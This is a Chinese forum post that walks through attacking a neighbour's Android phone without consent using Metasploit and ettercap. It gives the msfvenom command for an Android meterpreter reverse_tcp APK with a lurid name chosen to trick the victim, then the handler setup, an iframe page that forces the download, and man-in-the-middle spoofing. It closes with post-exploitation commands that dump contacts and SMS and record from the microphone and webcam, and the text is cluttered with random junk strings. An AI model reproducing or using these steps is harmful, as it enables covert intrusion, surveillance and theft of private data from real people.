找回密码
 立即注册
查看: 2500|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

) v- L m% ~ b! J4 r 五、msf+ettercap入侵邻居安卓手机 / k3 k) E }; B' P3 T" Q$ r

3 S/ w2 d7 J! w$ s J

2 f& P/ j- d3 w \0 }' K 首先启动msf ; }: n4 i( G$ V6 N( v. ^

+ }3 J: t# z' n& Q0 x7 C3 C

" {* l0 {7 Y- n 先用kali生成一个安卓木马,如下命令: . X- i$ q C- a; H3 G) o

( d, B; n( ?/ ]" d

+ B4 _. t6 a. k& u0 w- J Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk . W3 X$ }6 C# U& G4 h' u

( k' x9 C' `2 S5 D6 r( w* u7 k

: H" `6 O. X8 Y& i; C$ z( a: o 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 5 }& P& T0 P* ]6 p/ R' t/ U$ m+ Z

8 h* y6 v! i% U8 x/ `7 n6 I

& A& J+ b+ S% r( [; U1 n( p 然后进入msf & K- z/ y0 [9 Q6 H$ S: N

+ Y" y- x+ x' v: p, J9 M6 ?, a- d

0 ]4 Q$ F1 U7 `- u$ m! R use exploit/multi/handler , A# A: m; X8 d1 ^ R

5 \2 i: `9 N# O, \

7 W3 M% \- {2 _ @0 A! w: P set payload android/meterpreter/reverse_tcp - ^4 I- T4 b( j( ]

# |* S, o- R, a. x. r' U

+ C' g0 G' Z0 z+ q) Q T set LHOST 192.168.0.109 //ipkailiip ; i. u* d$ E* e, r; Y. a

2 l. W# A+ F+ c& u8 L. s

7 V' A# R" U e' q% n3 g set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / w- S! y) c5 y- L0 N

. ?$ U" g& D/ V; w$ `

9 |: n5 E1 E v, f1 S# G: B Exploit / V6 m! P" w' R5 z2 i

4 I1 {3 P$ A5 ?1 y5 N

0 b" R" G' P/ L! |5 m) U   + b$ }1 J$ s. R- L* s: ?

4 j, @# V% Y8 {3 X" H0 z8 g

; M8 ]- ]+ u% \5 _" F 下面我们开启ettercap -G 8 |4 [+ `+ |2 [4 w' V$ O

8 f6 J+ u: G; F4 ]

, O$ G7 P) M* T 我物理IP 6 D1 a! B' I' O" A% h( {4 R

0 p5 R# u* Y3 i" ^; m) o

3 R6 H$ \! k. W6 G% C3 P' T9 e   . l9 t& Z& l& J' w

' \/ e$ Q, i- h8 a9 [( I. I

# m, F7 z4 I* H$ I) c 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 4 k9 U/ O& S' Q S* {+ [( x7 Y0 p

- F* S. @ X3 y) {2 N0 Z

" p Y- N {8 @ 下面我们来设置一下 h1 u& E2 ^ M6 Y% X1 z4 u

4 Z& `5 z1 c N# [

s9 @3 `, T; P5 z1 k* U% Y: Z   $ k* i7 e1 k2 z

+ Z; k( ?9 j/ H% z

" V0 l6 K9 y. v 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ' d" _$ l' z% f: T1 k! a

0 v! y! l r8 c F/ [

7 Z& i. l) P3 T6 V( u4 G   . k+ G' A- i: p( ]" h V- j8 s

; ?. y9 Y _. V4 ^, V& A

8 u2 S( o) m; R7 p2 W   , @: V& B; d9 w |, s; Y! [

1 W% K6 K$ B6 b& y$ f5 G

; j9 b3 e3 ~' L/ D   9 i/ ~" K, N0 m& o0 k& _5 `6 ^' M

2 J. Q5 l+ m( s9 j% m0 d

0 n; Q4 {/ y# J   2 h; x8 P a! e5 E: o( `7 X9 F3 @

/ I+ H, X$ Z9 W. O9 U) {+ R0 A! m

2 s) `. {7 L. o   " K2 C0 x/ D& F4 u& k

/ p( T7 Q5 [3 E, {& [* p: e* [

! |, W S7 B7 h; }; U. G   4 V, G5 o* g" D4 i$ t

x) B3 y- z2 B' n4 }& R$ T

; q) I, v. M8 [! ^+ u! H5 Z/ m3 V   . G3 r6 N; j, f$ `9 ]

/ V0 c+ T2 Z- @3 o% D; p8 u% j2 g

3 S" D6 H) H+ I5 n# d* M   . Z9 d0 }$ u: K4 Q& ^$ a

# ? ^! B! \1 Q9 P5 W! l

F3 Q" R8 ]- k, m. r( l6 i( w: s3 s   1 I! C: N% t7 w6 [) d' r& B

! K9 m8 }- Q" j9 `7 @1 C, J

! c4 {7 Y* G: K3 Q9 J- `   3 R/ z- W& x' V: Y

& X1 l2 f) D3 o; t" W7 T

3 d, `0 W/ L5 G1 ?% U   ; M+ J/ `4 _$ Y

, {5 a$ P, ]; H5 I: L& P6 ?3 }

5 S- E r& d( V1 I4 H% c9 R7 u   # u' q6 |! L7 F% B8 U6 f* l# h- p

* P4 Y& l2 X3 q; s

0 c' `! F. r* {" q3 }6 T7 z8 h2 k   9 D% l( @% I) c! S8 x o/ g

( |! \. |* L7 v) q

# H$ y+ _- S0 m3 U$ n! l+ U 下面我们开始攻击 ; h+ t4 w0 u: S; ~( E1 r

+ V& K+ F7 w `" W- y6 Q7 t( L% I

/ v" b; {$ }8 d1 M& u; {" O   & a- }' v- A1 X0 {0 D) }

2 n9 M$ r- G. L! e# o

. D; ~6 T7 M4 \) t% Q   ) s( ?1 e& {% q# Y4 v

8 I6 y& F" W9 ?- j/ v

3 j2 E* _9 |( h* Z% t   + P8 {4 |& A( b

- K% e1 `' y' x' z

8 H* v3 ^% }5 Q   4 h1 |; r' Q5 T4 Z1 p

5 u o. E. g* a* I2 X

& \& `: |4 X2 y   & y5 p7 |' F7 a7 W

6 _3 j! H) s9 _; c4 }

( H5 f9 i: d7 s! [8 i2 `/ s 大概过了5分钟多,发现反弹成功了 . @9 z3 T) o# t1 j2 G# u

9 Q: |* z; p, S$ L3 g* b B

1 K1 j: x# n1 i% H4 E   9 i6 E* b. Q) s" [0 Y

+ v! d& k5 M6 U

+ q* ~" }; `) c# O5 N   " K5 A' h' I3 }, M0 l. _4 G. X

7 W' e! R4 r2 E& f

0 v5 W' \* ?7 P) M3 Q7 C   & N" Q8 g: q; R4 F

7 w! Y( @! T" ]3 T

2 d7 s$ a0 J* e0 u X; F   ! a$ d( J0 }) s2 @( h7 d h

8 T" ? P- t& H8 a( N! W; H

5 `$ p+ y2 C$ [3 N# x+ m   ' R5 @6 w6 A2 |) ?9 F4 K/ r" h9 A% x

9 p" v6 V/ c, o" R

* O) [& `* J8 P) R" @0 c- u   7 v* H9 U* L# M

' M4 j8 I3 u, u: o9 s( n4 i

" e: x- [2 a: k: E   / s' j6 B2 w- }9 j4 t. O7 j! z

2 R! H2 w" N* m8 y# V

+ j6 ^% q: s0 N$ d$ X" Y& x( g 执行命令 ( ?+ n$ b; Z4 @! Y( U) e( X5 a

7 K& Z- W* u4 i( u

6 l5 y& `$ A! n2 |+ R: M   2 h5 j: H" C& y% N2 _1 b

* q7 d+ a, `% V! w2 l. W s3 a! t; x

& h; w* l" x4 h. R, Y dump_contacts    --》这个是导出电话 : E: \* K; i+ L1 o4 c

0 Q+ G- E* P( b% _! H f! o

" O& I8 A% p# e& N( M! q% A. [ dump_sms --》这个是导出信息 1 T: G+ }: N$ W; f6 [- W) P

. Z3 t$ |0 c3 V5 D* ]; E

3 v2 }7 `+ Q9 t' v5 Z record_mic     Record audio from the default microphone for X seconds # \) I7 ]# ~6 M7 [ r6 e

8 Q4 u n8 c/ V3 W. _/ [

3 y: K) v# e/ j/ P$ z% A! p     webcam_chat    Start a video chat ( ^, S" M: L0 v4 h( h1 ^0 |0 s

, c( \, E' Q0 K! ], M$ @# G

" n. F+ ^* j* v P, m     webcam_list    List webcams & v) A% ^7 I- {/ p3 M- c. t

& m4 R& a$ U0 K6 v8 d

' F' S8 ]/ s' }/ `1 H. z6 D     webcam_snap    Take a snapshot from the specified webcam 6 @# w" K/ t0 a- F+ r4 L

% W# f! D. Q: h' n; ~6 S

' f1 x+ Q+ S3 A& Q, i4 m webcam_stream  lay a video stream from the specified webcam N& x9 t3 \8 q4 J

: K5 K( o* g8 Q5 w7 M m0 ^

% d- z3 Q* e) x( R4 H! a- `   6 a2 x+ ? n$ o! b

4 P# F" h9 J( _6 o' j# u' I

; s; m& O* e( V& C0 f8 \   4 d5 \5 @ @0 C' t

4 l/ ?! y6 l4 O* o$ V, {9 D9 q

4 n' e8 S- ]3 R& T5 y 我们打开看一下电话薄, - w: s: ^+ F$ C8 Y; D

6 I; w; z `$ q- E7 s- A, @5 F

^1 Y7 t) m' T2 f" T7 t* }# q   6 n0 x% K4 S6 w

V5 e/ e3 j+ W: o3 H% o

) x# R: O0 v$ J& u# y4 D) W   1 v1 N$ o# w, b4 R

a% q* a9 Y$ z4 _: E

6 m, M% L. v# I$ f   ( |1 s% L$ ~, q' R; B1 w8 e

. g3 d x, C% O7 v

2 R3 b) e# a" K! U$ @   & c/ g' C6 p( p. Z+ ^( h/ V

, p" f5 e1 b5 M- m4 Z$ L3 V# U

5 k" `4 v: n" g; t$ H7 G1 C4 M   # Q; q( W9 R) O: r8 p5 _) d

7 a B, F1 ]/ w+ T' Y T% O9 ]% n6 ^

7 p' z* E: { S4 [9 k- t3 A8 L   3 |8 J5 X; j' @ X

0 ~) { `1 W% `

& h H; e1 W1 p: `9 ~3 g4 c% X4 f3 v 我们同时欺骗成DroidJack木马,使用方法如图: 5 q& `/ o7 V! r* a3 L/ Y: Z

0 V8 |! l T7 d' N, `% v$ c& ~& y

' Z# w; J# I& E# s7 `   1 N! Z1 }5 i4 R1 |

6 j( b& ~9 N& w: {

- F7 y- q5 \5 Q7 j7 D1 \/ G. T( J   , {/ T# i1 y5 j; v/ m J

& I' m4 y p- d2 ?, B, T

. k! ^4 O* Y5 W, ~3 r8 l   ! {/ P! [: f. w# p- w, `5 p

% f; u: z' F" ?

8 u2 q( H! h" m: a 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 5 R+ t" I- Q6 y" W Q

' a5 A6 f. }2 u

+ T \0 A l! f F, {   . v1 r9 S3 ^: n5 m/ K8 ]

' U' p9 B6 M R2 [- V6 p

# M0 q6 t. I! R9 w" x6 m' [   " V; f. k! J, O' u" Q% q

1 m z! k* X% Q6 h

/ {5 j9 h4 D" R `   5 J; _8 s0 { e

7 ]4 A5 T3 \/ V

! i9 K! d) a8 \: ]9 s $ u, A0 x3 a9 J9 z* K o

; }# h) x8 j) p9 t: I- l0 x1 I

5 l. L/ F1 L8 v
' [' o. x/ M2 H6 ]9 {. y" X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表